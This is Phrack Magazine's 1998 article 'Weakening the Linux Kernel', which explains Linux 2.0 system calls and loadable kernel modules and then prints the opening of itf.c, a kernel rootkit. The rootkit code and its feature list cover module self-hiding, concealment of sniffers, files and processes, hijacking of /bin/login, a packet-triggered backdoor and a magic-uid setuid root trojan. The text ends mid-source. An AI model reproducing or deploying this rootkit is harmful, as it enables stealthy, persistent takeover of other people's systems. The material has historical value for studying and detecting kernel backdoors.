Subject: [Phrack] Weakening the Linux Kernel
---[ Phrack Magazine Volume 8, Issue 52 January 26, 1998, article 18 of 20
-------------------------[ Weakening the Linux Kernel
--------[ plaguez <dube0866@eurobretagne.fr>
----[ Preamble
The following applies to the Linux x86 2.0.x kernel series. It may also be
accurate for previous releases, but has not been tested. 2.1.x kernels
introduced a bunch of changes, most notably in the memory management routines,
and are not discussed here.
Thanks to Halflife and Solar Designer for lots of neat ideas. Brought to you
by plaguez and WSD.
----[ User space vs. Kernel space
Linux supports a number of architectures, however most of the code and
discussion in this article refers to the i386 version only.
Memory is divided into two parts: kernel space and user space. Kernel space
is defined in the GDT, and mapped to each processes address space. User
space is in the LDT and is local to each process. A given program can't
write to kernel memory even when it is mapped because it is not in the
same ring.
You also can not access user memory from the kernel typically. However,
this is really easy to overcome. When we execute a system call, one
of the first things the kernel does is set ds and es up so that memory
references point to the kernel data segment. It then sets up fs so that
it points to the user data segment. If we want to use kernel memory
in a system call, all we should have to do is push fs, then set it to ds.
Of course, I have not actually tested this, so take it with a pound or
two of salt :).
Here are a few of the useful functions to use in kernel mode for transferring
data bytes to or from user memory:
#include <asm/segment.h>
get_user(ptr)
Gets the given byte, word, or long from user memory. This is a macro, and
it relies on the type of the argument to determine the number of bytes to
transfer. You then have to use typecasts wisely.
put_user(ptr)
This is the same as get_user(), but instead of reading, it writes data
bytes to user memory.
memcpy_fromfs(void *to, const void *from,unsigned long n)
Copies n bytes from *from in user memory to *to in kernel memory.
memcpy_tofs(void *to,const *from,unsigned long n)
Copies n bytes from *from in kernel memory to *to in user memory.
----[ System calls
Most libc function calls rely on underlying system calls, which are the
simplest kernel functions a user program can call. These system calls are
implemented in the kernel itself or in loadable kernel modules, which are
little chunks of dynamically linkable kernel code.
Like MS-DOS and many others, Linux system calls are implemented through a
multiplexor called with a given maskable interrupt. In Linux, this interrupt
is int 0x80. When the 'int 0x80' instruction is executed, control is given to
the kernel (or, more accurately, to the function _system_call()), and the
actual demultiplexing process occurs.
The _system_call() function works as follows:
First, all registers are saved and the content of the %eax register is checked
against the global system calls table, which enumerates all system calls and
their addresses. This table can be accessed with the extern void
*sys_call_table[] variable. A given number and memory address in this table
corresponds to each system call. System call numbers can be found in
/usr/include/sys/syscall.h. They are of the form SYS_systemcallname. If the
system call is not implemented, the corresponding cell in the sys_call_table
is 0, and an error is returned. Otherwise, the system call exists and the
corresponding entry in the table is the memory address of the system call code.
sc()
{ // system call number 165 doesn't exist at this time.
__asm__(
"movl $165,%eax
int $0x80");
}
main()
{
errno = -sc();
perror("test of invalid syscall");
}
[root@plaguez kernel]# gcc no1.c
[root@plaguez kernel]# ./a.out
test of invalid syscall: Function not implemented
[root@plaguez kernel]# exit
Normally, control is then transferred to the actual system call, which performs
whatever you requested and returns. _system_call() then calls
_ret_from_sys_call() to check various stuff, and ultimately returns to user
memory.
----[ libc wrappers
The int $0x80 isn't used directly for system calls; rather, libc functions,
which are often wrappers to interrupt 0x80, are used.
libc is actually the user space interface to kernel functions.
libc generally features the system calls using the _syscallX() macros, where X
is the number of parameters for the system call.
For example, the libc entry for write(2) would be implemented with a _syscall3
macro, since the actual write(2) prototype requires 3 parameters. Before
calling interrupt 0x80, the _syscallX macros are supposed to set up the stack
frame and the argument list required for the system call. Finally, when the
_system_call() (which is triggered with int $0x80) returns, the _syscallX()
macro will check for a negative return value (in %eax) and will set errno
accordingly.
Let's check another example with write(2) and see how it gets preprocessed.
main()
{
char *t = "this is a test.n";
write(0, t, strlen(t));
}
[root@plaguez kernel]# exit
Note that the '4' in the write() function above matches the SYS_write
definition in /usr/include/sys/syscall.h.
----[ Writing your own system calls.
There are a few ways to create your own system calls. For example, you could
modify the kernel sources and append your own code. A far easier way, however,
would be to write a loadable kernel module.
A loadable kernel module is nothing more than an object file containing code
that will be dynamically linked into the kernel when it is needed.
The main purposes of this feature are to have a small kernel, and to load a
given driver when it is needed with the insmod(1) command. It's also easier
to write a lkm than to write code in the kernel source tree.
With lkm, adding or modifying system calls is just a matter of modifying the
sys_call_table array, as we'll see in the example below.
----[ Writing a lkm
A lkm is easily written in C. It contains a chunk of #defines, the body of the
code, an initialization function called init_module(), and an unload function
called cleanup_module(). The init_module() and cleanup_module() functions
will be called at module loading and deleting. Also, don't forget that
modules are kernel code, and though they are easy to write, any programming
mistake can have quite serious results.
Check the mandatory #defines (#define MODULE, #define __KERNEL__) and
#includes (#include <linux/config.h> ...)
Also note that as our lkm will be running in kernel mode, we can't use libc
functions, but we can use system calls with the previously discussed
_syscallX() macros or call them directly using the pointers to functions
located in the sys_call_table array.
You would compile this module with 'gcc -c -O3 module.c' and insert it into
the kernel with 'insmod module.o' (optimization must be turned on).
As the title suggests, lkm can also be used to modify kernel code without
having to rebuild it entirely. For example, you could patch the write(2)
system call to hide portions of a given file. Seems like a good place for
backdoors, also: what would you do if you couldn't trust your own kernel?
----[ Kernel and system calls backdoors
The main idea behind this is pretty simple. We'll redirect those damn system
calls to our own system calls in a lkm, which will enable us to force the
kernel to react as we want it to. For example, we could hide a sniffer by
patching the IOCTL system call and masking the PROMISC bit. Lame but
efficient.
To modify a given system call, just add the definition of the extern void
*sys_call_table[] in your lkm, and have the init_module() function modify the
corresponding entry in the sys_call_table to point to your own code. The
modified call can then do whatever you wish it to, meaning that as all user
programs rely on those kernel calls, you'll have entire control of the system.
This point raises the fact that it can become very difficult to prevent
intruders from staying in the system when they've broken into it. Prevention
is still the best way to security, and hardening the Linux kernel is needed on
sensitive boxes.
----[ A few programming tricks
- Calling system calls within a lkm is pretty easy as long as you pass user
space arguments to the given system call. If you need to pass kernel space
arguments, you need to be sure to modify the fs register, or else
everything will fall on its face. It is just a matter of storing the
system call function in a "pointer to function" variable, and then using this
variable. For example:
- Hiding a module can be done in several ways. As Runar Jensen showed in
Bugtraq, you could strip /proc/modules on the fly, when a program tries to
read it. Unfortunately, this is somewhat difficult to implement and, as it
turns out, this is not a good solution since doing a
'dd if=/proc/modules bs=1' would show the module. We need to find another
solution. Solar Designer (and other nameless individuals) have a solution.
Since the module info list is not exported from the kernel, there is no direct
way to access it, except that this module info structure is used in
sys_init_module(), which calls our init_module()! Providing that gcc does not
fuck up the registers before entering our init_module(), it is possible to get
the register previously used for struct module *mp and then to get the address
of one of the items of this structure (which is a circular list btw). So, our
init_module() function will include something like that at its beginning:
int init_module()
{
register struct module *mp asm("%ebx"); // or whatever register it is in
*(char*)mp->name=0;
mp->size=0;
mp->ref=0;
...
}
Since the kernel does not show modules with no name and no references (=kernel
modules), our one won't be shown in /proc/modules.
----[ A practical example
Here is itf.c. The goal of this program is to demonstrate kernel backdooring
techniques using system call redirection. Once installed, it is very hard to
spot.
Its features include:
- stealth functions: once insmod'ed, itf will modify struct module *mp and
get_kernel_symbols(2) so it won't appear in /proc/modules or ksyms' outputs.
Also, the module cannot be unloaded.
- sniffer hidder: itf will backdoor ioctl(2) so that the PROMISC flag will be
hidden. Note that you'll need to place the sniffer BEFORE insmod'ing itf.o,
because itf will trap a change in the PROMISC flag and will then stop hidding
it (otherwise you'd just have to do a ifconfig eth0 +promisc and you'd spot
the module...).
- file hidder: itf will also patch the getdents(2) system calls, thus hidding
files containing a certain word in their filename.
- process hidder: using the same technic as described above, itf will hide
/procs/PоD directories using argv entries. Any process named with the magic
name will be hidden from the procfs tree.
- execve redirection: this implements Halflife's idea discussed in P51.
If a given program (notably /bin/login) is execve'd, itf will execve
another program instead. It uses tricks to overcome Linux memory managment
limitations: brk(2) is used to increase the calling program's data segment
size, thus allowing us to allocate user memory while in kernel mode (remember
that most system calls wait for arguments in user memory, not kernel mem).
- socket recvfrom() backdoor: when a packet matching a given size and a given
string is received, a non-interactive program will be executed. Typicall use
is a shell script (which will be hidden using the magic name) that opens
another port and waits there for shell commands.
- setuid() trojan: like Halflife's stuff. When a setuid() syscall with uid ==
magic number is done, the calling process will get uid = euid = gid = 0
<++> lkm_trojan.c
/*
* itf.c v0.8
* Linux Integrated Trojan Facility
* (c) plaguez 1997 -- dube0866@eurobretagne.fr
* This is mostly not fully tested code. Use at your own risks.
*
*
* compile with:
* gcc -c -O3 -fomit-frame-pointer itf.c
* Then:
* insmod itf
*
*
* Thanks to Halflife and Solar Designer for their help/ideas.
*
* Greets to: w00w00, GRP, #phrack, #innuendo, K2, YmanZ, Zemial.
*
*
*/
/* Customization section
* - RECVEXEC is the full pathname of the program to be launched when a packet
* of size MAGICSIZE and containing the word MAGICNAME is received with recvfrom().
* This program can be a shell script, but must be able to handle null **argv (I'm too lazy
* to write more than execve(RECVEXEC,NULL,NULL); :)
* - NEWEXEC is the name of the program that is executed instead of OLDEXEC
* when an execve() syscall occurs.
* - MAGICUID is the numeric uid that will give you root when a call to setuid(MAGICUID)
* is made (like Halflife's code)
* - files containing MAGICNAME in their full pathname will be invisible to
* a getdents() system call.
* - processes containing MAGICNAME in their process name will be hidden of the
* procfs tree.
*/
#define MAGICNAME "w00w00T$!"
#define MAGICUID 31337
#define OLDEXEC "/bin/login"
#define NEWEXEC "/.w00w00T$!/w00w00T$!login"
#define RECVEXEC "/.w00w00T$!/w00w00T$!recv"
#define MAGICSIZE sizeof(MAGICNAME)+10
/* old system calls vectors */
int (*o_getdents) (uint, struct dirent *, uint);
ssize_t(*o_readdir) (int, void *, size_t);
int (*o_setuid) (uid_t);
int (*o_execve) (const char *, const char *[], const char *[]);
int (*o_ioctl) (int, int, unsigned long);
int (*o_get_kernel_syms) (struct kernel_sym *);
ssize_t(*o_read) (int, void *, size_t);
int (*o_socketcall) (int, unsigned long *);
/* entry points to brk() and fork() syscall. */
static inline _syscall1(int, brk, void *, end_data_segment);
static inline _syscall0(int, fork);
static inline _syscall1(void, exit, int, status);
extern void *sys_call_table[];
extern struct proto tcp_prot;
int errno;
char mtroj[] = MAGICNAME;
int __NR_myexecve;
int promisc;
/*
* String-oriented functions
* (from user-space to kernel-space or invert)
*/
char *strncpy_fromfs(char *dest, const char *src, int n)
{
char *tmp = src;
int compt = 0;
do {
dest[compt++] = __get_user(tmp++, 1);
}
while ((dest[compt - 1] != '